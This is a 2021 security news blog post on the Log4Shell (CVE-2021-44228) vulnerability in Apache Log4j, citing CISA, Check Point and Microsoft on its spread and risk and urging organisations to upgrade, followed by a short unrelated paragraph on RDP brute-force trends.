Skip to main content
banner image
venafi logo

Log4j Attacks Spike, CISA Says Vulnerability Is ‘One of Most Serious’ to Date

Log4j Attacks Spike, CISA Says Vulnerability Is ‘One of Most Serious’ to Date

December 14, 2021 | Brooke Crothers

Security researchers are seeing widespread scanning for the vulnerability as malicious actors quickly jump on the Apache Log4j attack bandwagon. In response, CISA is on high alert and says it will actively maintain a community-sourced GitHub repository of publicly available information and vendor-supplied advisories regarding the Log4j vulnerability, among other Log4j vulnerability guidance.


Do You Understand the Anatomy of a Supply Chain Attack? Download the White Paper.
Log4j vulnerability explained

CISA said it is responding to active, widespread exploitation of a critical remote code execution (RCE) vulnerability in Apache’s Log4j software library, versions 2.0-beta9 to 2.14.1, known as "Log4Shell" and "Logjam.”

Log4j is “very broadly used” in a variety of consumer and enterprise services, websites, and applications, as well as operational technology product to log security and performance information, CISA said. The vulnerability allows an unauthenticated remote actor to potentially take control of an affected system.

The vulnerability appears in the action the Java Naming and Directory Interface (JNDI) takes to resolve variables, according to CISA. “Affected versions of Log4j contain JNDI features—such as message lookup substitution—that ‘do not protect against adversary-controlled LDAP [Lightweight Directory Access Protocol] and other JNDI related endpoints,’” according to the CVE-2021-44228 listing.

“An adversary can exploit this vulnerability by submitting a specially crafted request to a vulnerable system that causes that system to execute arbitrary code. The request allows the adversary to take full control over the system. The adversary can then steal information, launch ransomware, or conduct other malicious activity,” CISA said.

Log4j attacks spike quickly

Early reports show attacks spiking quickly. Check Point Research said it saw a “pandemic-like spread since the outbreak on Friday” and attacks rose to over 40,000 Saturday.

Twenty four hours after the initial outbreak, Check Point recorded almost 200,000 attack attempts globally. As of Tuesday, Check Point recorded over 1,270,000 attempts with over 46% of those attempts made by known malicious groups.

“We have so far seen an attempted exploit on almost 44% of corporate networks globally,” Check Point said.

CISA Director: one of the most serious ‘in my career’

CISA Director Jen Easterly said in a phone briefing Monday (via Cyberscoop) that the vulnerability “is one of the most serious I’ve seen in my entire career, if not the most serious.”

In response, CISA and its partners, through the Joint Cyber Defense Collaborative, are tracking and responding to active, widespread exploitation of the vulnerability.

CISA urges organizations to review its Apache Log4j Vulnerability Guidance webpage and upgrade to Log4j version 2.15.0, or apply the appropriate vendor recommended mitigations immediately. CISA will continue to update the webpage as additional information becomes available.

Microsoft describes exploitation risk

A common pattern of exploitation risk is a web application with code designed to process usernames, referrer, or user-agent strings in logs, according to Microsoft.  “These strings are provided as external input (e.g., a web app built with Apache Struts). An attacker can send a malformed username or set user-agent with the crafted exploit string hoping that this external input will be processed at some point by the vulnerable Log4j 2 code and trigger code execution,” Microsoft said.

Urgent action needed

CISA said it urges all organizations to review the latest CISA activity alert and upgrade to log4j version 2.15.0, or apply their appropriate vendor recommended mitigations immediately.

“To be clear, this vulnerability poses a severe risk. We will only minimize potential impacts through collaborative efforts between government and the private sector. We urge all organizations to join us in this essential effort and take action,” CISA said.

Brute-forcing RDP (Remote Desktop Protocol) is becoming one of the most common attacks. In the past these attacks were primarily used by sophisticated APT groups but in 2021 they became much more accessible and are now being utilized by a wide variety of threat actors, including those with limited resources and minimal technical skills. Even script kiddies can use this attack vector.

This trend started before the pandemic but has accelerated significantly with the broad adoption of remote work and we should expect this trend to accelerate in 2022 for a variety of reasons:

  • An RDP compromise provides any threat actor with an open backdoor for a wide range of exploits, including ransomware attacks
  • Misconfigured machines with open external RDP ports continue to be extremely common
  • Many machines continue to use weak credentials which are vulnerable to RDP attacks and do not include additional security controls and RDP access continues to be sold on the Dark Web as a commodity dramatically increasing the pool of actors using these exploits

Related posts

Like this blog? We think you will love this.
Featured Blog

Surge in Machine and Human Identities Drive Security Policies at Organizations [Report]

‘Explosion’ of machine identities

Read More
Subscribe to our Weekly Blog Updates!

Join thousands of other security professionals

Get top blogs delivered to your inbox every week

See Popular Tags

You might also like

TLS Machine Identity Management for Dummies

TLS Machine Identity Management for Dummies

Certificate-Related Outages Continue to Plague Organizations
White Paper

CIO Study: Certificate-Related Outages Continue to Plague Organizations

About the author

Brooke Crothers
Brooke Crothers
Read Posts by Author
get-started-overlay close-overlay cross icon
get-started-overlay close-overlay cross icon
Venafi Risk assessment Form Image

Sign up for Venafi Cloud

Venafi Cloud manages and protects certificates

* Please fill in this field Please enter valid email address
* Please fill in this field Password must be
At least 8 characters long
At least one digit
At last one lowercase letter
At least one uppercase letter
At least one special character
* Please fill in this field
* Please fill in this field
* Please fill in this field

End User License Agreement needs to be viewed and accepted

Already have an account? Login Here

get-started-overlay close-overlay cross icon

How can we help you?

Thank you!

Venafi will reach out to you within 24 hours. If you need an immediate answer please use our chat to get a live person.

In the meantime, please explore more of our solutions

Explore Solutions

learn more

Email Us a Question

learn more

Chat With Us

learn more